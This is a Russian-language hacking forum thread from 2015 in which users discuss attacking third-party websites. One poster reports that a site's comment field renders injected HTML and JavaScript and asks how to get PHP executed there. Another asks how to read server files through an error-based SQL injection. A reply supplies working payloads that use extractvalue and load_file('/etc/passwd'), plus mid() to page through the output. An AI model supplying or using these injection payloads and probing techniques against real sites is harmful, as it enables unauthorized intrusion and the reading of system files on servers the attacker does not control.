 |
|
03.11.2015, 15:34
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Сообщение от Konqi
↑
phpinfo();
но что то сомневаюсь что сработает в твоем случай. почти уверен что данные записываються в базу и оттуда выводяться
коментирует падла(
Если же записывает в базу, то вариантов нет больше никаких?) точнее я имел ввиду бесполезно что то пробовать?
|
|
|
03.11.2015, 15:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от GroM88
↑
коментирует падла(
Если же записывает в базу, то вариантов нет больше никаких?) точнее я имел ввиду бесполезно что то пробовать?
да, код не обрабатываеться интерпретатором. Если программист сильно не перестарался то ничего не выйдет.
|
|
|
|
03.11.2015, 15:39
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Сообщение от Konqi
↑
phpinfo();
но что то сомневаюсь что сработает в твоем случай. почти уверен что данные записываються в базу и оттуда выводяться
phpinfo(); таким способом я пробовал уже) не выводит phpinfo (
|
|
|
|
03.11.2015, 15:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от GroM88
↑
phpinfo(); таким способом я пробовал уже) не выводит phpinfo (
значит копай в другую сторону
|
|
|
|
03.11.2015, 16:03
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Сообщение от GroM88
↑
Чучуть поподробнее пжлст) или хотя ткните носом в пруф где описано как это делается...
А то читать все..и практиковать уйдет куча времени... которого и так впринципе то нет(
Индивидуальный, самописанный))
Точнее сказал бы пару лет назад писали одни, а фичу с добавлением коментариев уже не так давно дописал другой)
Заранее всем благодарен за помощь.
откуда тогда знаешь что админ не видит коменарий?
|
|
|
|
03.11.2015, 16:35
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Сообщение от psihoz26
↑
откуда тогда знаешь что админ не видит коменарий?
Узнавал через знакомого модератора, модератор узнавал у админа.
Да и логически подумать, на сайте куева туча пользователей, ежедневно одного и того же пользователя добавляют в ЧС 10 - 20 человек.
Вообщем инфа 100% что админ не видит.
|
|
|
|
03.11.2015, 22:22
|
|
Участник форума
Регистрация: 22.12.2011
Сообщений: 170
С нами:
7574006
Репутация:
2
|
|
да какой
php код выполняется на стороне сервера, а в браузере может сработать только javascript
|
|
|
|
04.11.2015, 08:59
|
|
Новичок
Регистрация: 04.11.2015
Сообщений: 2
С нами:
5539286
Репутация:
0
|
|
Есть инъекция вида:
extractvalue(1,concat(0x5c,(SELECT substring((*),1,32) FROM * limit 0,1)))
С правами file_priv='Y'.
Как помощью ее, можно читать файли на сервере?
|
|
|
|
04.11.2015, 10:51
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от errorbaser
↑
Есть инъекция вида:
extractvalue(1,concat(0x5c,(SELECT substring((*),1,32) FROM * limit 0,1)))
С правами file_priv='Y'.
Как
с помощью
ее, можно читать файли на сервере?
extractvalue(1,concat(0x5c,(SELECT load_file('/etc/passwd')))) выведет только 31 символ, далее используй mid
mid(load_file('/etc/passwd'),1,30)
c 1 символа выводим 30 символов
|
|
|
|
04.11.2015, 13:05
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Сообщение от {iddqd}
↑
да какой
php код выполняется на стороне сервера, а в браузере может сработать только javascript
Ты видимо не читал предыдущие посты, либо не совсем понял в чем проблема.
Ссылка идет вида http://megasite.ru/member.html?id=54321
При добавлении коментария Если добавлть html код, он отлично врезается в страницу и выполняется, java script тоже выполняется. А вот когда добавляешь php код например то он не выполняется потому что стоит какой то чудо фильтр на
Konqi,капать там больше некуда) вот добавили этот баговый коментарий к добавлению мембера в ЧС)
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
